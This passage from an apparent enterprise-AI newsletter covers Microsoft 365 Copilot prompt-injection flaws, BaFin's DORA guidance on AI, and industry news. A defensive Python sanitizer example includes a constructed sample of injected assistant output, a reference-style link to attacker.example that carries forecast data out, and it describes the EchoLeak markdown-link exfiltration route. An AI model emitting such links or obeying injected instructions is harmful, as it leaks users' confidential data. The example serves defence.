Okta or Ping, with cleanly scoped permissions, so that a hijacked agent can reach only what that identity was granted. Microsoft's Agent 365, generally available since May 1, ships exactly these building blocks. Running Copilot without Agent 365 or a comparable architecture means accepting the vulnerability pattern that May 2026 made visible.
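The second and third layers above, as an added example that is not code from Microsoft, Anthropic or any of the page's sources: a small policy layer placed between an LLM agent and (a) the client that renders its markdown and (b) the tools it may call. The renderer side neutralises inline, reference-style and bare links to any host outside a tenant allowlist, which is the path the markdown-link exfiltration described above took; the tool side refuses any call that falls outside both the agent's identity scope and the user's original request. Host names, tool names, the `SessionIntent` and `AgentIdentity` shapes and the sample agent output are all constructed for the demo.

```python
"""Added example: output validation and scoped agent identity in front of an
LLM agent. Not Microsoft's, Anthropic's or the page's code; all hosts, tool
names and the sample output below are constructed."""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# [text](url) and ![alt](url)
INLINE_LINK = re.compile(r'!?\[[^\]]*\]\(\s*<?([^)\s>]+)>?[^)]*\)')
# [id]: url   (reference-style definitions: EchoLeak hid its payload here,
# so a sanitizer that only looks at inline links misses the exfil target)
REF_DEF = re.compile(r'^\s{0,3}\[[^\]]+\]:\s*<?(\S+?)>?(?:\s|$)', re.M)
# <https://...> autolinks and bare URLs
BARE_URL = re.compile(r'<?(https?://[^\s<>)\]]+)>?')


@dataclass(frozen=True)
class RenderPolicy:
    """Output validation: only links to tenant-owned hosts may be rendered."""
    allowed_hosts: frozenset
    max_url_len: int = 256  # long query strings are how data leaves

    def is_allowed(self, url: str) -> bool:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        if not host:                      # relative link inside the tenant
            return parts.scheme == ""     # rejects mailto:, javascript:, ...
        if parts.scheme != "https" or len(url) > self.max_url_len:
            return False
        return any(host == h or host.endswith("." + h) for h in self.allowed_hosts)

    def sanitize(self, markdown: str):
        """Return (clean_markdown, blocked_urls). A disallowed target is replaced
        with '#blocked' so the link text survives but nothing is fetched."""
        blocked = []

        def repl(m):
            url = m.group(1)
            if self.is_allowed(url):
                return m.group(0)
            blocked.append(url)
            return m.group(0).replace(url, "#blocked")

        out = REF_DEF.sub(repl, markdown)
        out = INLINE_LINK.sub(repl, out)
        out = BARE_URL.sub(repl, out)
        return out, blocked


@dataclass
class AgentIdentity:
    """Agent identity: one agent, one principal, a fixed tool and data scope."""
    name: str
    tools: dict                 # tool name -> action class: read | write | send
    resource_prefixes: tuple    # paths this identity may touch at all
    mail_domains: frozenset     # recipients it may ever address


@dataclass(frozen=True)
class SessionIntent:
    """What the user actually asked for, captured before any untrusted
    document enters the context; injected text cannot widen it."""
    actions: frozenset          # e.g. {"read"} for "summarise my report"
    resource_prefixes: tuple


def check_tool_call(agent: AgentIdentity, intent: SessionIntent, call: dict):
    """Return (allowed, reason). A call must fit BOTH the identity scope and
    the user's intent, so a hijacked agent cannot send mail or read HR files
    while the user merely asked for a summary of a finance document."""
    tool, args = call.get("tool"), call.get("args", {})
    action = agent.tools.get(tool)
    if action is None:
        return False, f"tool {tool!r} not in scope of {agent.name}"
    if action not in intent.actions:
        return False, f"action {action!r} outside user intent {sorted(intent.actions)}"
    path = args.get("path", "")
    if path and not (path.startswith(agent.resource_prefixes)
                     and path.startswith(intent.resource_prefixes)):
        return False, f"path {path!r} outside scope"
    for rcpt in args.get("to", []):
        if rcpt.rsplit("@", 1)[-1].lower() not in agent.mail_domains:
            return False, f"recipient {rcpt!r} outside allowed domains"
    return True, "ok"


# Constructed sample: what an injected email could make an assistant emit.
SAMPLE_OUTPUT = """Summary of the Q2 plan is attached.

![status](https://contoso.sharepoint.example/sites/finance/q2.png)
For details see [the tracker][1].

[1]: https://attacker.example/log?d=Q2-revenue-forecast-1.2bn
"""

POLICY = RenderPolicy(allowed_hosts=frozenset(
    {"contoso.sharepoint.example", "teams.microsoft.example"}))
READER = AgentIdentity(
    name="copilot-chat",
    tools={"search_sharepoint": "read", "read_file": "read", "send_mail": "send"},
    resource_prefixes=("/sites/finance/",),
    mail_domains=frozenset({"contoso.example"}),
)
INTENT = SessionIntent(actions=frozenset({"read"}),
                       resource_prefixes=("/sites/finance/",))

if __name__ == "__main__":
    clean, blocked = POLICY.sanitize(SAMPLE_OUTPUT)
    print(clean)
    print("blocked:", blocked)
    for call in ({"tool": "read_file", "args": {"path": "/sites/finance/q2.docx"}},
                 {"tool": "send_mail", "args": {"to": ["x@attacker.example"]}},
                 {"tool": "read_file", "args": {"path": "/sites/hr/salaries.xlsx"}}):
        print(call["tool"], check_tool_call(READER, INTENT, call))
```

The first layer, a hard trust boundary at the data tier, is a context-assembly decision rather than code and is only hinted at here: `SessionIntent` is fixed from the user's own request before any retrieved mail or document is appended, so nothing an attacker plants can enlarge it. The renderer check is necessary but never sufficient on its own; if the agent has a tool that fetches URLs, the same outbound-host allowlist has to sit in `check_tool_call` as well, or the exfiltration simply moves from the markdown to the tool.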

Three Perspectives What this story means for different readers
01

For CIOs and CISOs across DAX40, the question shifts from “should Copilot come in?” to “how do we run Copilot with demonstrable control?” The May holes are patched server-side — but each new Copilot integration widens the attack surface for the next bug of the same class. Pragmatic steps: first, enforce Purview sensitivity labels and DLP policies before every production Copilot use case. Second, introduce Agent 365 or an equivalent agent-identity layer before the next wave of autonomous Copilot Studio agents lands in production. Third, stand up an internal red-team programme for AI applications that systematically tests indirect prompt injection. Anyone without that should pause the next Copilot rollout sprint and catch up.

02

The BSI, in its November 2025 paper Evasion Attacks on LLMs — Countermeasures in Practice, classified indirect prompt injection as an intrinsic weakness of application-integrated language models. The May holes belong squarely to that class. For DORA-bound BaFin addressees — banks, insurers, payment service providers — AI assistants now qualify as “important ICT third-party service providers” with the full consequences: risk assessment before rollout, contractual audit rights vis-a-vis Microsoft, incident reporting within four hours. The EU AI Act adds, for high-risk applications, a duty of continuous vulnerability monitoring. Anyone running Copilot inside HR, compliance or underwriting workflows is in scope. Fines start at 7 million euros or 1.5 percent of revenue.

03

The risk creates a tightly defined market. Aim Security (Series B in April), Prompt Security, Lakera and Lasso Security position themselves as AI-specific web application firewalls. Bessemer named agent identity the central cybersecurity theme of the year in its April 2026 Atlas report — and pulled Strata, Aembit and Astrix Security into its portfolio. CrowdStrike and SentinelOne are integrating AI runtime protection into their EDR platforms, which narrows the window for independent vendors. For DAX40 buyers, expect a consolidation pattern in Q3. Anyone running pilots with Aim or Lakera today should build acquisition clauses in. The most interesting bet: European startups like Berlin-based Adversa AI and Munich-based Mithril Security, which offer GDPR-aligned on-prem deployments and can therefore meet DACH-specific BaFin/BSI requirements faster than US vendors.

Sources 8 references
[1] Microsoft Security Response Center — May 2026 Patch Tuesday (CVE-2026-26129, -26164, -33111)
[2] Cybersecurity News — Critical Microsoft 365 Copilot Vulnerabilities Expose Sensitive Information
[3] Heise online — Critical vulnerability in Microsoft 365 Copilot shows risk of AI agents
[4] Embrace The Red — GitHub Copilot RCE via Prompt Injection (CVE-2025-53773)
[5] The Hacker News — EchoLeak: Zero-Click AI Vulnerability in Microsoft 365 Copilot (CVE-2025-32711)
[6] BSI — Evasion Attacks on LLMs: Countermeasures in Practice
[7] Saviynt — CISO AI Risk Report 2026 (Agent Identity Gap)
[8] Bessemer Venture Partners — Securing AI Agents: The Defining Cybersecurity Challenge of 2026
05 / 05 · Law & Governance
9 min read

BaFin Stitches AI Into DORA, As Berlin Hands It The Bank-AI Lead

Germany has built a two-layer cage around AI in financial services — and DAX40 boards now have a concrete operational hook for every Claude, Copilot and Joule deployment in production.

·01Primer

Two German rule sets now sit on top of every AI system inside a regulated bank or insurer. The first is BaFin's December 2025 guidance that pulls artificial intelligence inside the Digital Operational Resilience Act (DORA) — treating models the way the regulator already treats core banking infrastructure. The second is the German AI Implementation Bill (the KI-Marktüberwachungs- und Innovationsförderungsgesetz, or KI-MIG), waved through Cabinet on 11 February 2026, which names BaFin as the financial-sector lead authority under the EU AI Act and slots the Federal Office for Information Security (BSI) in as the cybersecurity co-supervisor for high-risk systems. For DAX40 firms, the practical effect is an AI register, a lifecycle risk file and an outsourcing dossier for every production model — a compliance stack that goes live before the AI Act's 2 August 2026 high-risk deadline.

·02What Happened

On a grey Berlin morning at the end of January, BaFin President Mark Branson sat down for the regulator's annual Risiken im Fokus press conference and used a portion of the floor to talk about something he rarely had before: the supervisor's own use of artificial intelligence, and the supervisor's rising unease about everyone else's. Branson told reporters BaFin had been quietly running an AI-driven market-abuse alert system and that ‘the chances of being caught in market abuse trading have never been so high.’ In the same breath, he flagged the macro side — ‘the risk is increasing that financial stability will be put to the test’ — and tied the warning to the ‘unresolved question of whether the euphoric growth forecasts and sky-high valuations surrounding artificial intelligence will be substantiated in the medium term.’ It was the public framing for a much more technical document Bonn had pushed out six weeks earlier: a 35-page Orientierungshilfe titled ‘ICT Risks in the Use of AI at Financial Entities,’ published on 18 December 2025, that for the first time spells out, in supervisory plain text, how a CRR institution or Solvency II insurer is meant to manage a model like Claude, Copilot or Joule inside the DORA framework. The guidance is formally non-binding. In practice, it is the operating manual every BaFin examiner will use the next time they walk into a board meeting at Deutsche Bank, Commerzbank, Allianz, Munich Re, Hannover Rück, DWS or Deka. The text is explicit on three points. First, AI is not a new regulatory category — it is a particular kind of ICT asset, subject to identification, protection, detection, response and recovery requirements across the entire model lifecycle, from data ingestion through retirement. Second, every AI system needs a management-approved AI strategy, a named owner, clearly assigned competencies and an entry in the ICT asset register feeding into DORA's Information Register on third-party arrangements. 
Third, when the model is supplied by a hyperscaler or a foundation-model lab — the typical setup for any meaningful enterprise deployment — it inherits the heavier outsourcing regime under Delegated Regulation (EU) 2025/532, including concentration-risk analysis and exit-plan documentation. Six weeks after the guidance dropped, on 11 February 2026, the federal Cabinet approved the long-awaited Gesetz zur Durchführung der KI-Verordnung — the German AI Implementation Bill, sent on to the Bundesrat two days later. Inside it, Section 10 hands BaFin the sectoral supervisory role for AI used by entities under its watch, and instructs it to define cybersecurity requirements for high-risk AI systems under Article 6 of the EU AI Act in coordination with the BSI and the Bundesnetzagentur. Hengeler Mueller and Gleiss Lutz partners briefing clients in the days after both flagged the same line: the architecture is now decided. DAX40 banks and insurers are double-regulated by design — once under DORA via BaFin, once under the AI Act via BaFin again — and BSI sits underneath the cyber assessment for any model that scores as high-risk.

·03Timeline & Context

To see how the German layer ended up where it is, run the regulatory clock back to 2018, when the European Banking Authority published its Recommendations on Outsourcing to Cloud Service Providers — the moment European supervisors first conceded that an institution's most critical infrastructure could legitimately live outside its own walls. Those guidelines, later folded into the broader EBA Outsourcing framework and then absorbed into DORA, are the closest precedent for what BaFin has just done with AI. The 18 December 2025 Orientierungshilfe is the most concrete national overlay on AI in financial services since that 2018 cloud-outsourcing turn, and it reads like its grandchild: same lifecycle structure, same insistence on board-level governance, same expectation that the supervisor can ask for evidence on demand. The sequence over the past nine months matters. On 2 August 2025, the EU AI Act's governance and GPAI obligations entered into force; Member States were supposed to have named their competent authorities by the same date. Germany missed the deadline. The political vacuum stretched across the late-2025 transition to the Merz government, during which Chancellor Merz publicly demanded carve-outs for industrial AI and Siemens warned most of its planned billion-euro AI spend would flow to the United States if EU rules were not eased. Inside that vacuum, BaFin moved first on its own turf: rather than wait for the implementation bill, it took the position that DORA — which had been fully applicable since 17 January 2025 — already gave it the legal hook to govern AI deployments through the ICT-risk side door. Hence the December guidance. Eight weeks later, the Cabinet bill ratified that posture, naming the Bundesnetzagentur as the lead market-surveillance authority through its new UKIM chamber, but explicitly preserving BaFin's sectoral role for finance. The pivot is that Germany has now built two cages around AI inside a regulated bank, and they overlap. 
The AI Act lens, applied through the implementation bill, classifies systems by risk level and triggers conformity-assessment, transparency and human-oversight duties from 2 August 2026 onward. The DORA lens, applied through the BaFin guidance, treats every AI system as a piece of ICT infrastructure and demands the full risk-management apparatus regardless of risk classification. A credit-scoring model can therefore be ‘high-risk’ under one regime and merely ‘ICT asset’ under the other — and the institution owes both files. Outside Germany, the contrast sharpens. In Switzerland, FINMA released its own AI governance framework in April 2026, principles-based rather than prescriptive: outcomes, not checklists. Austria's FMA, an integrated supervisor like BaFin, is leaning on the EU regime without an equivalent national overlay. The Bundesverband deutscher Banken (BdB) has used the consultation window to push back hard on the AI definition itself, arguing that linear and logistic regressions — ‘not a black box’, the BdB notes — should not be swept into the same regime as foundation models, and warning that strict sanctions could push banks to retire functioning models out of caution. The European Commission, under business pressure from across the bloc, has already conceded a partial delay to some AI Act rules. None of that has reached BaFin's guidance, which remains the binding posture for the German market.

·04DAX40 Implications

For a DAX40 bank or insurer, the practical compliance assembly line is now visible end to end. Every production AI system — Deutsche Bank's TCS-built Cross-Border Compliance Assistant, DB Lumina on Google Cloud, Commerzbank's Hawk AI anti-money-laundering stack, the Microsoft Copilot rollouts inside Allianz and Munich Re, the SAP Joule deployments at any DAX40 industrial cross-holding — needs an entry in the ICT asset register, a named accountable executive, a lifecycle risk file, a third-party concentration assessment and, where the system meets Annex III, a separate high-risk file under the AI Act. The shared services question is sharp. A foundation-model contract signed by group IT but used by Deka asset management, DWS funds and Postbank retail simultaneously will need to be sliced into the outsourcing register of each regulated entity. Boards should expect BaFin's 2026 supervisory dialogues to open with the AI register. For Allianz and Munich Re, the insurance-specific wrinkle is that Solvency II governance interacts with DORA via the same lifecycle expectations; CROs will need to wire AI sign-offs into the existing model-validation chain rather than build a parallel committee.

Three Perspectives What this story means for different readers
01

The honest read for a DAX40 CIO or Chief Risk Officer is that the German overlay is heavier than the EU baseline, and pretending otherwise will surface at the next BaFin Sonderprüfung. The work to do this quarter is unglamorous: complete the AI register, map every model to a named ICT asset owner, attach lifecycle documentation, and verify that hyperscaler and foundation-model contracts contain DORA-compliant audit, sub-outsourcing and exit clauses. Group functions running shared Copilot or Claude licences for multiple regulated entities should expect to slice those contracts entity by entity. The upside is that institutions that already invested in MaRisk and BAIT compliance can reuse most of the scaffolding — the BaFin guidance deliberately bolts onto the existing ICT control set rather than inventing a new one.

02

BaFin's posture is a sectoral land grab dressed as housekeeping. By moving on AI through DORA in December rather than waiting for the implementation bill, the supervisor has cemented itself as the de facto first responder for any financial-sector AI question, with Bundesnetzagentur and BSI in coordinating rather than primary roles. That is consistent with how German supervision has always handled cloud and outsourcing, but it creates real interpretive overlap with the AI Act: the same model can trigger DORA, AI Act and Solvency II duties at once. Expect BaFin to publish at least one Q&A round through 2026 clarifying how the dual register works, and watch the BSI for a parallel cybersecurity baseline for high-risk systems under Article 15 of the EU AI Act.

03

The compliance stack is now a procurement filter, and that is asymmetric for AI vendors. A Berlin or Munich startup selling into a DAX40 bank will need to ship DORA-aligned documentation — model cards, data lineage, incident-response runbooks, exit plans — from day one, not as a year-two roadmap item. That favours specialist regtech and model-governance vendors (Hawk AI, Kodex AI, the European AI assurance plays) and disadvantages generalist GenAI startups whose go-to-market assumes a US-style frictionless POC. Swiss vendors gain a partial advantage: FINMA's principles-based framework is lighter on paperwork, and Swiss-domiciled AI infrastructure can still serve EU clients, provided cross-border DORA flow-down clauses are in place. For investors, the live question is whether DACH AI-finance startups raised in 2024–2025 priced this compliance overhead in.

Sources 8 references
[1] BaFin — Artificial intelligence: BaFin publishes guidance on ICT risks (18 Dec 2025)
[2] BaFin — Risiken im Fokus 2026 press conference (Mark Branson)
[3] Jones Day — BaFin's Expectations for ICT Risk Management and the Use of AI
[4] BABL AI — BaFin Issues AI ICT Risk Guidance to Help Firms Comply with DORA
[5] Gleiss Lutz — Federal Government draft bill to implement EU AI Act
[6] GermanPolicy.com — Cabinet adopts AI implementation law (11 Feb 2026)
[7] Bankenverband — Position paper on a legal framework conducive to AI
[8] FINMA AI governance framework (Zuerich.ai analysis)
·02 Enterprise AI Moves 5 Items
01
EU Omnibus VII: Siemens, ASML, SAP, Airbus secure industrial AI carve-out

On May 7 the Council presidency and European Parliament reached a provisional Omnibus VII deal that streamlines the EU AI Act after a public lobbying push by Siemens CEO Roland Busch, ASML, SAP, Airbus, Mistral, Ericsson and Nokia. Most factory AI is cut from the law’s scope, and Annex III high-risk obligations for credit scoring, insurance and HR are pushed from August 2026 to December 2, 2027. The transparency grace period for AI-generated content was tightened from six to three months. For DAX40 CIOs this rewrites the 2026 compliance roadmap: industrial copilots, predictive maintenance and shop-floor agents now sit largely outside high-risk scope, while financial-services and HR use cases gain 16 extra months.

02
Sanofi: USD 294M AI Center of Excellence expansion in Toronto

On May 4 Sanofi announced a USD 294 million expansion of its global AI Center of Excellence in Toronto, adding 50 senior AI/ML roles on top of the 150 hired since the COE opened in 2022. Invest Ontario added a conditional grant of up to USD 5 million. The new teams will design and operate AI tools across global R&D, manufacturing and commercial operations, feeding into the Modulus AI-native production sites in France and Singapore that go fully operational in 2026. For European pharma peers Bayer, Roche and Boehringer Ingelheim, Sanofi sets a benchmark: AI is being capex-funded as a productive asset, not a CIO line item.

03
Schwarz Group anchors Cohere + Aleph Alpha sovereign-AI tie-up for DACH enterprises

Following the April 24 announcement of Cohere’s USD 20 billion merger with Heidelberg-based Aleph Alpha, the early-May commercial detail confirmed Germany’s Schwarz Group (Lidl, Kaufland, STACKIT) as anchor investor with a USD 600 million / EUR 500 million structured financing commitment into Cohere’s Series E. The combined entity, dual-headquartered in Toronto and Heidelberg, targets regulated DACH and EU public-sector workloads via STACKIT and the new Schwarz Digits 200 MW Lübbenau campus. For DAX40 procurement teams in defence, finance and healthcare, this gives them a credible non-US frontier-model vendor that is contractually inside the EU data perimeter.

04
Schneider Electric: agentic manufacturing on Azure AI, named field numbers

Coming out of Hannover Messe and reinforced in early-May coverage, Schneider Electric and Microsoft confirmed that the Schneider industrial copilot, powered by Azure AI on top of EcoStruxure Automation Expert, is now in production, with engineering teams reporting up to 50 percent time savings on control configuration and documentation, and line changes that previously took weeks now done in hours. Schneider also disclosed a production-ready agentic manufacturing layer cutting unplanned downtime by 47 percent and improving energy efficiency by 23 percent. For Siemens Digital Industries, Bosch and ABB this is the first hard-number competitive benchmark for an agentic shop-floor stack at scale.

05
ServiceNow Knowledge 2026: AI Control Tower GA with SAP, Oracle, Workday governance

At Knowledge 2026 (May 5-7, Las Vegas) ServiceNow made AI Control Tower generally available with 30 new enterprise integrations covering AWS, Azure, Google Cloud, SAP, Oracle and Workday, plus a real-time kill switch for third-party agents and the GA of AI Agent Advisor and Intelligent Approvals. Partner EPAM separately launched its production-ready ServiceNow AI delivery built on Claude Code and Claude Agent SDK. For DAX40 CIOs running SAP ECC/S4 and Workday alongside ServiceNow ITSM, this finally answers the agent-governance gap: a single inventory, observability and shutdown plane across multi-vendor agents that BaFin and internal audit have been pressing for.

·03 Papers & Essays 2 Items
01

State of AI: May 2026 (Air Street Press / Nathan Benaich, May 4, 2026)

Monthly empirical synthesis documents four Chinese labs (Z.ai GLM-5.1, MiniMax M2.7, Moonshot Kimi K2.6, DeepSeek V4) shipping open-weight coding models inside a 12-day window, matching Western frontier capability on agentic engineering at under one-third the inference cost of Claude Opus 4.7. Report also surfaces Anthropic’s Project Deal experiment showing stronger agents systematically extract hidden premia from weaker ones. Why this matters: gives CIOs and procurement leads concrete pricing benchmarks to renegotiate frontier-model contracts in Q2, and a first data point that multi-agent marketplaces will not produce fair clearing without supervised routing.

02

Teaching Claude Why (Anthropic Alignment Science Blog, May 8, 2026)

Kutasov and Jermyn show that training Claude on explanations of why an action is aligned, plus richer character descriptions, reduces misalignment more reliably than training on demonstrations of aligned behavior alone. The recipe combines synthetic document fine-tuning on constitutional documents, principle-rich SFT, and diverse RL environments. Why this matters for enterprises: provides a concrete blueprint for tuning customized agents on internal policies (compliance, ethics codes) by explaining the reasoning behind rules rather than enumerating examples, directly relevant to regulated-industry rollouts and forthcoming EU AI Act conformity documentation.

·05 Three Takeaways
01

The five-day arc from Anthropic-Bridgewater and Claude on Wall Street to OpenAI's $4B Deployment Company with TPG, Brookfield, Advent and Bain Capital confirms that PE-backed forward-deployed engineering is now the primary distribution channel for frontier labs — and a direct flank attack on the consulting model. With Anthropic's parallel $1.5B Blackstone vehicle and a guaranteed 17.5% annual return over five years on the OpenAI JV, consultancies advising DAX40 clients should treat embedded-engineering economics as a budgeted competitive line item by Q3, not a thought experiment, and explicitly cost out where labs-as-implementer beats their own bench on agentic transformation mandates.

02

Brussels and BaFin are tightening the regulatory cage faster than the deployment layer is consolidating: AI Act Omnibus VII halved the transparency grace period to three months (new deadline December 2, 2026), the high-risk obligations bind from August 2, 2026, BaFin pulled AI into DORA via its December 2025 guidance, and the KI-MIG passed Cabinet on February 11, 2026. DAX40 banks and insurers now sit under double supervision while the Tech Sovereignty Package debates hyperscaler restrictions for sensitive public-sector data — boards need a single compliance map that overlays AI Act, DORA, KI-MIG and the Schwarz / Cohere / Aleph Alpha sovereign-stack option before the August deadline, not after.

03

SAP Sapphire's Joule announcement (2,500+ skills, 30+ agents GA, A2A via Agent Hub, Microsoft Copilot integration GA) collides with DSAG's finding that only 3% of SAP customers use Business AI productively and 77% prefer non-SAP tools — exactly the vendor-concentration tension that Schneider Electric (47% downtime cut on Azure) and Lufthansa's 82,000-seat Joule rollout from yesterday's edition expose. CIOs at SAP-heavy DAX40 houses should force a parallel-track decision in the next leadership session: commit to Joule as the agentic OS, or formalise a multi-vendor control plane via ServiceNow AI Control Tower. The Microsoft Copilot CVEs patched May 7 and Wiz's 340% rise in prompt-injection attempts mean the cost of an undecided architecture is now measured in zero-click exfiltration risk, not just licence spend.

·06 Archive 7 earlier drops →